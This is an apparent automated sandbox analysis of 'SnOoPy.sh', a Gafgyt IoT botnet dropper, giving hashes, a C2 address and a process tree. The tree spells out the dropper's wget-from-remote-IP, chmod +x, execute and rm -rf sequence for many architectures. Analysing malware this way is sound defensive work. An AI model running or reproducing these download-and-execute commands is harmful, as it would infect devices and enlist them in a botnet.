Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
03-12-2024 22:19
Static task
static1
Behavioral task
behavioral1
Sample
SnOoPy.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
SnOoPy.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
SnOoPy.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
SnOoPy.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
SnOoPy.sh
-
Size
2KB
-
MD5
8ea1e7d08dd0cf52bbdddc3222e9b8af
-
SHA1
f031a227d961d83fc0083c4b5b7b4ccdfe64e711
-
SHA256
2884954c3ee63cc245def342b3946b24b0aa2cbaebf7d6b2c5a8fd009760a469
-
SHA512
1be9d8a04c9b95e9e07c6fad4ae90a160219b05d0bf4b77578ac7dee91b5f336688ac792aab88cc78b5923963e1c9bacf8c0407fc22119041e9def0f217800da
Malware Config
Extracted
gafgyt
192.3.179.33:23
Signatures
-
Detected Gafgyt variant 1 IoCs
resource yara_rule behavioral2/files/fstream-1.dat family_gafgyt -
Gafgyt family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 751 chmod 767 chmod 717 chmod 721 chmod 728 chmod 707 chmod 711 chmod 735 chmod 743 chmod 759 chmod 680 chmod 692 chmod 700 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/a-r.m-6.SNOOPY 712 a-r.m-6.SNOOPY -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route a-r.m-6.SNOOPY -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route a-r.m-6.SNOOPY -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/a-r.m-6.SNOOPY wget
Processes
-
/tmp/SnOoPy.sh/tmp/SnOoPy.sh1⤵PID:663
-
/usr/bin/wgetwget http://192.3.179.33/m-i.p-s.SNOOPY2⤵PID:666
-
-
/bin/chmodchmod +x m-i.p-s.SNOOPY2⤵
- File and Directory Permissions Modification
PID:680
-
-
/tmp/m-i.p-s.SNOOPY./m-i.p-s.SNOOPY2⤵PID:682
-
-
/bin/rmrm -rf m-i.p-s.SNOOPY2⤵PID:683
-
-
/usr/bin/wgetwget http://192.3.179.33/m-p.s-l.SNOOPY2⤵PID:685
-
-
/bin/chmodchmod +x m-p.s-l.SNOOPY2⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/m-p.s-l.SNOOPY./m-p.s-l.SNOOPY2⤵PID:693
-
-
/bin/rmrm -rf m-p.s-l.SNOOPY2⤵PID:695
-
-
/usr/bin/wgetwget http://192.3.179.33/s-h.4-.SNOOPY2⤵PID:696
-
-
/bin/chmodchmod +x s-h.4-.SNOOPY2⤵
- File and Directory Permissions Modification
PID:700
-
-
/tmp/s-h.4-.SNOOPY./s-h.4-.SNOOPY2⤵PID:702
-
-
/bin/rmrm -rf s-h.4-.SNOOPY2⤵PID:703
-
-
/usr/bin/wgetwget http://192.3.179.33/x-8.6-.SNOOPY2⤵PID:704
-
-
/bin/chmodchmod +x x-8.6-.SNOOPY2⤵
- File and Directory Permissions Modification
PID:707
-
-
/tmp/x-8.6-.SNOOPY./x-8.6-.SNOOPY2⤵PID:708
-
-
/bin/rmrm -rf x-8.6-.SNOOPY2⤵PID:709
-
-
/usr/bin/wgetwget http://192.3.179.33/a-r.m-6.SNOOPY2⤵
- Writes file to tmp directory
PID:710
-
-
/bin/chmodchmod +x a-r.m-6.SNOOPY2⤵
- File and Directory Permissions Modification
PID:711
-
-
/tmp/a-r.m-6.SNOOPY./a-r.m-6.SNOOPY2⤵
- Executes dropped EXE
- Reads system routing table
- Reads system network configuration
PID:712
-
-
/bin/rmrm -rf a-r.m-6.SNOOPY2⤵PID:715
-
-
/usr/bin/wgetwget http://192.3.179.33/x-3.2-.SNOOPY2⤵PID:716
-
-
/bin/chmodchmod +x x-3.2-.SNOOPY2⤵
- File and Directory Permissions Modification
PID:717
-
-
/tmp/x-3.2-.SNOOPY./x-3.2-.SNOOPY2⤵PID:718
-
-
/bin/rmrm -rf x-3.2-.SNOOPY2⤵PID:719
-
-
/usr/bin/wgetwget http://192.3.179.33/a-r.m-7.SNOOPY2⤵PID:720
-
-
/bin/chmodchmod +x a-r.m-7.SNOOPY2⤵
- File and Directory Permissions Modification
PID:721
-
-
/tmp/a-r.m-7.SNOOPY./a-r.m-7.SNOOPY2⤵PID:722
-
-
/bin/rmrm -rf a-r.m-7.SNOOPY2⤵PID:723
-
-
/usr/bin/wgetwget http://192.3.179.33/p-p.c-.SNOOPY2⤵PID:724
-
-
/bin/chmodchmod +x p-p.c-.SNOOPY2⤵
- File and Directory Permissions Modification
PID:728
-
-
/tmp/p-p.c-.SNOOPY./p-p.c-.SNOOPY2⤵PID:729
-
-
/bin/rmrm -rf p-p.c-.SNOOPY2⤵PID:730
-
-
/usr/bin/wgetwget http://192.3.179.33/i-5.8-6.SNOOPY2⤵PID:732
-
-
/bin/chmodchmod +x i-5.8-6.SNOOPY2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/i-5.8-6.SNOOPY./i-5.8-6.SNOOPY2⤵PID:737
-
-
/bin/rmrm -rf i-5.8-6.SNOOPY2⤵PID:738
-
-
/usr/bin/wgetwget http://192.3.179.33/m-6.8-k.SNOOPY2⤵PID:740
-
-
/bin/chmodchmod +x m-6.8-k.SNOOPY2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/m-6.8-k.SNOOPY./m-6.8-k.SNOOPY2⤵PID:744
-
-
/bin/rmrm -rf m-6.8-k.SNOOPY2⤵PID:745
-
-
/usr/bin/wgetwget http://192.3.179.33/p-p.c-.SNOOPY2⤵PID:747
-
-
/bin/chmodchmod +x p-p.c-.SNOOPY2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/p-p.c-.SNOOPY./p-p.c-.SNOOPY2⤵PID:752
-
-
/bin/rmrm -rf p-p.c-.SNOOPY2⤵PID:753
-
-
/usr/bin/wgetwget http://192.3.179.33/a-r.m-4.SNOOPY2⤵PID:754
-
-
/bin/chmodchmod +x a-r.m-4.SNOOPY2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/a-r.m-4.SNOOPY./a-r.m-4.SNOOPY2⤵PID:760
-
-
/bin/rmrm -rf a-r.m-4.SNOOPY2⤵PID:761
-
-
/usr/bin/wgetwget http://192.3.179.33/a-r.m-5.SNOOPY2⤵PID:762
-
-
/bin/chmodchmod +x a-r.m-5.SNOOPY2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/a-r.m-5.SNOOPY./a-r.m-5.SNOOPY2⤵PID:768
-
-
/bin/rmrm -rf a-r.m-5.SNOOPY2⤵PID:769
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
108KB
MD5d99e614a76b1b6b63030556a22cf2881
SHA11cc0cc981f07d648722bc0b112da2d697858558f
SHA2566bcf634cf08615de9c4f5759bcc2523b114db64a67ed3c119c7aa4230be0b0b5
SHA51219585dae9db8f913f809da6644127b064b03ec2156fe482b87feb803c8facb291da0b951336c7bc13cef6af1a032229f8f18511b09531a2ad3dce4f53bb8051f